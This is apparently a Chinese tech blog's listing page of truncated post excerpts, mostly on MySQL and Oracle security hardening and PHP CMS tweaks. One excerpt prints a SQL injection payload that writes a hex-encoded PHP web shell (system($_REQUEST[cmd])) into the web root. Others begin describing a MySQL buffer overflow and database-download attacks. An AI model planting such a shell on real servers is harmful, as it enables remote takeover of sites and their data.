夏日博客

为你的MySQL数据库加铸23道安全门

为你的MySQL数据库加铸23道安全门
使用mysql,安全问题不能不注意。以下是mysql提示的23个注意事项: 1.如果客户端和服务器端的连接需要跨越并通过不可信任的网络,那么就需要使用ssh隧道来加密该连接的通信。 2.用set password语句来修改用户的密码,三个步骤,先“mysql -u root”登陆数据库系统,然后“mysql> update mysql.user set password=password('newpwd')”,最后执行“flush privileges”就可以了。 3.需要提防的攻击有,防偷听、...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

如何保护MySQL 中的重要数据

如何保护MySQL 中的重要数据
在日常的工作中,保护数据免受未授权用户的侵犯是系统管理员特别关心的问题。如果你目前用的是MySQL,就可以使用一些方便的功能来保护系统,来大大减少机密数据被未授权用户访问的风险。 企业最有价值的资产通常是其数据库中的客户或产品信息。因此,在这些企业中,数据库管理的一个重要部分就是保护这些数据免受外部攻击,及修复软/硬件故障。 在大多数情况下,软硬件故障通过数据备份机制来处理。多数数...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

MySQL数据库中的安全解决方案

MySQL数据库中的安全解决方案
随着网络的普及,基于网络的应用也越来越多。网络数据库就是其中之一。通过一台或几台服务器可以为很多客户提供服务,这种方式给人们带来了很多方便,但也给不法分子造成了可乘之机。由于数据都是通过网络传输的,这就可以在传输的过程中被截获,或者通过非常手段进入数据库。由于以上原因,数据库安全就显得十分重要。因此,本文就以上问题讨论了MySQL数据库在网络安全方面的一些功能。 帐户安全: 帐户是M...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

MySQL服务器内部安全数据目录访问

MySQL服务器内部安全数据目录访问
作为MySQL管理员的您,在维护MySQL安装的安全性和完整性方面能够做些什么。在本文中,我们将更详细地讨论以下与安全性相关的问题: 为什么说安全性是重要的,应该警惕哪些攻击? 从服务器主机中的用户那里您将面临什么风险(内部安全性),能做什么? 从在网络上连接到服务器的客户机那里您将面临什么风险(外部安全性),能做什么? MySQL管理员有责任保护数据库内容的安全,使得记录只能由经过严格认证的...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

通过Mysql的语句生成后门木马的方法

通过Mysql的语句生成后门木马的方法
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:2 3 再通过 http://www.xxx.com/c...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

MySQL3.23.31之前版本的安全漏洞

MySQL3.23.31之前版本的安全漏洞
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。 下面为最初发表于 MySQL 邮件列表的信件摘要。 漏洞是由Jo?o Gouveia 于1月12日发现的: 步骤: 在第一个终端上启动 mysql: spike:/var/mysql # /sbin/init.d/mysql start 在另外一个终端上输入: jroberto@spike:~ > mysql -p -e ...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

MySQL数据库下载漏洞攻击技术

MySQL数据库下载漏洞攻击技术
作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。 1.强制下载后缀名为ASP、ASA的数...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

Oracle8的不安全因素及几点说明

Oracle8的不安全因素及几点说明
Oracle8的不安全因素及几点说明 作为对象关系型数据库的杰出代表,Oracle无疑是最具实力的。无论是在数据库的规模,多媒体数据类型的支持,SQL操作复制的并行性还是在安全服务方面,Oracle均比SYBASE、Informix强许多,加上其最新版本Oracle8.0.4更是增强了这方面的特性,而且还引入了一些新的特性,比如:数据分区(Data Partitioning)、对象关系技术(Object Relational Technology)、唯索引表(Index only...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

PHP常用MySql操作

PHP常用MySql操作
PHP中常用的几个 mysql 语句 显示数据库或表: show databases;//然后可以use database_name; show tables; 更改表名: alter table table_name rename new_t; 添加列 : alter table table_name add column c_n column attributes; 删除列: alter table table_name drop column c_n; 创建索引: alter table c_table add index (c_n1,c_n2); alter table c_table add unique index_name(c_n); alter table c_t...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

MySQL安全问题的一点心得

MySQL安全问题的一点心得
前两天在帮朋友整理他的主页空间时候,发现的一点关于MySQL可能大家都会忽略的问题:我们知道,在安装完MySQL后,它会自动创建一个root用户和一个匿名用户,其初始密码都是空,对于前者,很多参考资料上都会提醒大家要注意及时设定一个密码,而忽略了后者,大概是因为后者默认设定为只能在本机使用的缘故吧。 但如果你的MySQL是要提供给Web服务器作数据库服务的,忽略这个匿名用户的代价可能相当惨重,因为...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

Mssql和Mysql的安全性分析

Mssql和Mysql的安全性分析
数据库是电子商务、金融以及ERP系统的基础,通常都保存着重要的商业伙伴和 客户信息。大多数企业、组织以及政府部门的电子数据都保存在各种数据库中,他们 用这些数据库保存一些个人资料,还掌握着敏感的金融数据。但是数据库通常没有象操作系统和网络这样在安全性上受到重视。数据是企业,组织的命脉所在,因此选择一款安全的数据库是至关重要的。大型网站一般使用oracle或DB2,而中小型网站大多数使用更...
2017年10月14日 PHP技术文章 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

帝国cms系统限制的登录次数不得超过 5 次,请等 60 分钟过后,方可重新登录

帝国cms系统限制的登录次数不得超过 5 次,请等 60 分钟过后,方可重新登录
1、在文件夹 e\config 中找到 config.php 文件; 2、打开该文件,第141行 ‘loginnum’=>5, (这里的数字5就是系统限制的登陆次数); 3、修改这个数字大于5,找到正确的账户和密码后再次登陆,就能成功进入后台了。 细心的朋友会发现另外一种解决方法: 1、同上 2、打开该文件,第142行 ‘logintime’=>60, (这里的数字60就是登陆限制后需要等待的时间,单位分钟); 3、修改这个数字为 0 ,找到正确的...
2016年06月12日 PHP开源系统 评论 5 条 喜欢 1 阅读 0 views 次 阅读全文

PHCMS企业黄页模块安装

PHCMS企业黄页模块安装
说明:网站找了很久没有找到详细的安装说明方法,都是简单一说还是不明白研究了一下成功安装,写一下安装方法。 下面以yp_UTF8为例安装​ 1.官方下载企业黄页模块 ​2.解压文件;拷贝文件 yp_UTF8内所有文件和目录到 (网站根目录)\内,提示重复,覆盖文件和目录 3.网站后台->模块->模块管理->列表->找到企业黄页 点击【安装】。
2016年06月12日 PHP开源系统 暂无评论 喜欢 3 阅读 0 views 次 阅读全文

PHPCMS_V9 二次开发增加模板页出错:Action does not exist.

PHPCMS_V9 二次开发增加模板页出错:Action does not exist.
原因:​未在模型文件中加入驱动函数或驱动函数未正确加载模板文件 phpcms遵从的是MVC的架构模式,model、view、controller 如果你在phpcms/templates/default/下写好了自己的模板文件,例如:phpcms/templates/default/member/mass.html,那你只完成了view部分,如果想要模板显示不只是在浏览器地址栏写下地址: 你的域名或IP/index.phpm=member&c=index$a=mass 这时候​,你如果强行访问的话,就会得到错...
2016年06月12日 PHP开源系统 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

Phpcms v9 实现首页|列表页|内容页调用点击量的代码

Phpcms v9 实现首页|列表页|内容页调用点击量的代码
很多朋友经常问Phpcms v9的首页、列表页、内容页点击量如何调用。今天给大家分享phpcms V9如何分别在首页、列表页、内容页调用点击量代码 1,Phpcms v9首页调用点击量: {pc:content action="lists" catid="$r[catid]" num="5" order="id DESC" return="info"}      {php $categorys = getcache('category_content_'.$siteid,'commons');...
2016年06月12日 PHP开源系统 暂无评论 喜欢 1 阅读 0 views 次 阅读全文

dedecms 移动版 调用模版页的修改

dedecms 移动版 调用模版页的修改
给客户建立了一个简单的wap手机站,在建站的时候因为PC端的“新闻中心”栏目与“产品中心”栏目是两种模板,可不知道怎么给手机版的“新闻中心”栏目设置一个模板然后再给“产品中心”栏目设置另外一个模板啊?突发灵感,大胆尝试一下吧!大家都知道在命名时给最后添加 “_m” 就是手机站的模板了,因此我尝试了下将PC端“新闻中心”模板名称“list_news.htm”修改为了“list_news_m.htm”然后再将PC端“产品中心”模板名称“li...
2016年06月12日 PHP开源系统 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

Linux虚拟主机如何设置301跳转

Linux虚拟主机如何设置301跳转
设置之前要将跳转的域名解析到你的空间服务器上。例如,你想将 abc.com 跳转到 www.abc.com,或者是www.bcd.com 301重定向到 www.xiariboke.net,就要把abc.com 和www.xiariboke.net 域名解析到你的空间服务器。接下来就讲讲具体如何在Linux虚拟主机设置301跳转重定向。 一,将abc.com 301重定向到 www.abc.com 在本地新建一个文本文件,最好用的专业的编辑器软件编辑,将以下代码粘贴其中: RewriteEngi...
2016年06月12日 计算机技术 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

dedecms channel增加keyword根据关键词显示子栏目

dedecms channel增加keyword根据关键词显示子栏目
设计了一个网站里边有太多的子栏目但子栏目有很多关键词做区分和调用{dede:channel} 并不支持只好自己动手修改了我这里关键词用的是栏目的关键词根据栏目的关键词调用区分. 我用的版本是5.7 找到include\taglib目录下的channel.lib.php 找到$attlist = "typeid|0,reid|0,row|100,col|1,type|son,currentstyle|,cacheid|"; 替换为: $attlist = "typeid|0,reid|0,row|100,col|1,type|son,currentstyle|,cache...
2016年06月12日 PHP开源系统 暂无评论 喜欢 0 阅读 0 views 次 阅读全文

dedecms采集文章固定文章来源作者

dedecms采集文章固定文章来源作者
虽然从SEO的角度来说,采集真的不利于搜索引擎的抓取,但是设置好采集规则,也还是可以减少伪原创的时间,所以在这里就给大家分享一下dedecms采集文章固定文章来源作者的方法。 设置好采集规则之后,勾选你新创建的采点,点击“更改配置”,在“字段配置”里搜索: {/dede:item}{dede:item field='writer' value='' isunit='' isdown=''} {/dede:item}{dede:item field='source' value='' isunit='' isdown=''}...
2016年06月12日 PHP开源系统 评论 2 条 喜欢 0 阅读 0 views 次 阅读全文